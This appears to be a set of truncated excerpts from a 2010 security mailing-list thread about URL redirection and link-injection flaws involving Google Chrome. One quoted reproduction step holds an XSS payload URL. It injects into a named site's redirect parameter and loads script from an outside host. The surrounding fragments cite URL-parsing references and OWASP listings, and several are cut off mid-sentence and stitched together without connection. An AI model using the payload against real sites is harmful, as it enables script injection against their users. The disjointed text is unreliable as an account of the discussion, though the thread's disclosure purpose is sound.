Hi Berend-Jan
Please find the respective responses
> Repro steps:
> 1) Some website do not sanitize user input correctly, such as the one
> in your example, which allows things like XSS:
> http://www.worksafenb.ca/redirect.asp?V=";'%20src=http://skypher.com/SkyLined/xss.js> http://www.worksafenb.c
On Tue, Jan 05, 2010 at 10:49:07AM -0800, Michal Zalewski wrote:
> > Video: http://www.secniche.org/videos/google_chrome_link_inj.html
>
> You might find it informative to review the section of BSH on URL parsing:
> http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators
Also, a
Aditya,
> Video: http://www.secniche.org/videos/google_chrome_link_inj.html
You might find it informative to review the section of BSH on URL parsing:
http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators
There are many known quirks related to URL parsing; the practice of
cert
Hi
Recently with an outcome of Owasp RC1 top 10 exploited vulnerability
list , redirection issues have already
made a mark in that. Even the WASC has included the URL abusing as one
of the stringent attacks.
Well to be ethical in this regard these are not the recent attacks but
are persisting fro